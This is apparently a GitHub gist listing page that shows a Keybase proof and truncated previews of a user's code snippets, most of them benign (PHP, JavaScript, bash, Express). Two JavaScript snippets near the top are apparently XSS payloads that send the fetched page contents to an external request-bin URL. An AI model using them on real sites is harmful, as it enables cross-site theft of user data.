I hereby claim:
- I am naouak on github.
- I am naouak (https://keybase.io/naouak) on keybase.
- I have a public key ASA2xrjA7VPfq06ppkd000hVcLWbSsBIzjgz0dCIH729Vwo
To claim this, I am signing this object:
| <script type="javascript"> | |
| var oReq = new XMLHttpRequest(); | |
| oReq.open('POST', 'https://enr4iz1vymuof.x.pipedream.net/?'); | |
| oReq.send("test"); | |
| </script> |
| var oReq = new XMLHttpRequest(); | |
| oReq.addEventListener('load', function reqListener () { | |
| this.src='https://enr4iz1vymuof.x.pipedream.net/?' + this.responseText; | |
| }); | |
| oReq.open('GET', '/'); | |
| oReq.send(); | |
| } catch(e){ | |
| this.src= 'https://enr4iz1vymuof.x.pipedream.net/?' + e; | |
| } |
| <?php | |
| echo 0.1+0.2==0.3?'true':'false'; | |
| // false | |
| echo strval(0.1+0.2)==0.3?'true':'false'; | |
| // true |
I hereby claim:
To claim this, I am signing this object:
| <?php | |
| class PdfRenderer extends \mikehaertl\wkhtmlto\Pdf{ | |
| /** | |
| * Add a page object to the output | |
| * | |
| * @param string $input either a URL, a HTML string or a PDF/HTML filename | |
| * @param array $options optional options for this page | |
| * @return static the Pdf instance for method chaining | |
| */ | |
| public function addPage($input,$options=array(),$type = null) |
| function multiply(a,b){ | |
| return a.map(function(v,i){ | |
| v.map(function(w,j){ | |
| var sum = 0; | |
| for(var k = 0; k < v.length; k++){ | |
| sum+=a[i][k]*b[k][j]; | |
| } | |
| return sum; | |
| }); | |
| }); |
| #!/bin/bash | |
| # Liste des mots disponible ici : http://www.lexique.org/telLexique.php | |
| WORD_COUNT=$1 | |
| if [ -z "$WORD_COUNT" ]; then | |
| WORD_COUNT=1 | |
| fi | |
| LC_NUMERIC="C" |
| //Create a module for static middleware instanciation with a singleton | |
| //Use the same singleton for app.use and variable routing. | |
| //If there is some caching stuff going on, they should share the same cache which is a lot better. | |
| var express = require("express"); | |
| var static = null; | |
| module.exports = function(){ | |
| if(!static){ | |
| static = express.static(__dirname+"/public"); | |
| } |
| var n = document.querySelectorAll(".animetitle"); | |
| var arr = []; | |
| var min = null; | |
| var max = null; | |
| var total = 0; | |
| var count = 0; | |
| var noteCount = {}; | |
| for (var i = n.length - 1; i >= 0; i--) { | |
| (function(n){ |
| (function(){ | |
| function nativeTreeWalker() { | |
| var walker = document.createTreeWalker( | |
| document.body, | |
| NodeFilter.SHOW_TEXT, | |
| null, | |
| false | |
| ),node,textNodes = []; | |
| while (node = walker.nextNode()) { | |
| if (node.nodeValue) { |